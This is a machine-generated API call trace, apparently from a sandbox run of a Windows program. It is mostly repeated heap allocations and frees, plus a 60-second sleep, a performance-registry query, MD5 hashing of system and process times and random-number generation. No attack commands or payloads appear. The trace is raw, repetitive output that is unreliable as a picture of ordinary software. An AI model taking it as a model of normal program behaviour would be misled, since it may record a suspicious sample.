[0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.723] GetProcessHeap () returned 0xe30000 [0134.723] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.724] GetProcessHeap () returned 0xe30000 [0134.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.725] GetProcessHeap () returned 0xe30000 [0134.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.726] GetProcessHeap () returned 0xe30000 [0134.726] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681b3c8 | out: hHeap=0xe30000) returned 1 [0134.726] GetProcessHeap () returned 0xe30000 [0134.726] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0134.726] GetProcessHeap () returned 0xe30000 [0134.726] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b430 | out: hHeap=0xe30000) returned 1 [0134.726] GetProcessHeap () returned 0xe30000 [0134.726] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0134.726] Sleep (dwMilliseconds=0xea60) [0144.797] GetTickCount () returned 0x119602a [0144.797] GetProcessHeap () returned 0xe30000 [0144.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0144.797] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x795e97c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x795e97c*=0x3d8) returned 0x0 [0144.799] GetProcessHeap () returned 0xe30000 [0144.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0144.799] GetTickCount () returned 0x119602a [0144.799] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0144.799] GetCurrentProcess () returned 0xffffffff [0144.799] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0144.799] CryptAcquireContextA (in: phProv=0x795e978, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e978*=0xed4e60) returned 1 [0144.800] CryptCreateHash (in: hProv=0xed4e60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x795e97c | out: phHash=0x795e97c) returned 1 [0144.800] CryptHashData (hHash=0xec1a30, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0144.800] CryptGetHashParam (in: hHash=0xec1a30, dwParam=0x4, pbData=0x795e974, pdwDataLen=0x795e970, dwFlags=0x0 | out: pbData=0x795e974, pdwDataLen=0x795e970) returned 1 [0144.800] CryptGetHashParam (in: hHash=0xec1a30, dwParam=0x2, pbData=0x795e998, pdwDataLen=0x795e974, dwFlags=0x0 | out: pbData=0x795e998, pdwDataLen=0x795e974) returned 1 [0144.800] CryptDestroyHash (hHash=0xec1a30) returned 1 [0144.800] CryptReleaseContext (hProv=0xed4e60, dwFlags=0x0) returned 1 [0144.800] GetProcessHeap () returned 0xe30000 [0144.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0144.800] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="39") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="99") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="95") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="e4") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="ce") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="d0") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="12") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="42") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="02") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="51") returned 2 [0144.800] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="6c") returned 2 [0144.801] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="4a") returned 2 [0144.801] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="a0") returned 2 [0144.801] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="dd") returned 2 [0144.801] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="b9") returned 2 [0144.801] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="c0") returned 2 [0144.801] CryptAcquireContextW (in: phProv=0x795e6fc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e6fc*=0xed4910) returned 1 [0144.801] CryptGenRandom (in: hProv=0xed4910, dwLen=0x80, pbBuffer=0x795e710 | out: pbBuffer=0x795e710) returned 1 [0144.801] CryptReleaseContext (hProv=0xed4910, dwFlags=0x0) returned 1 [0144.801] GetProcessHeap () returned 0xe30000 [0144.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0144.801] GetProcessHeap () returned 0xe30000 [0144.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825cc8 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2c0d8 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811db8 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2c0d8 | out: hHeap=0xe30000) returned 1 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x68115c0 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6826538 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x681a5c8 [0144.802] GetProcessHeap () returned 0xe30000 [0144.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b6b8 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6818f38 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f5f0 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6810328 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b6b8 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6874278 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6810328 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fb48 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6811868 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fb48 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xe9be68 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811868 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.803] GetProcessHeap () returned 0xe30000 [0144.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.804] GetProcessHeap () returned 0xe30000 [0144.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.804] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.805] GetProcessHeap () returned 0xe30000 [0144.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.806] GetProcessHeap () returned 0xe30000 [0144.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.806] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.807] GetProcessHeap () returned 0xe30000 [0144.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 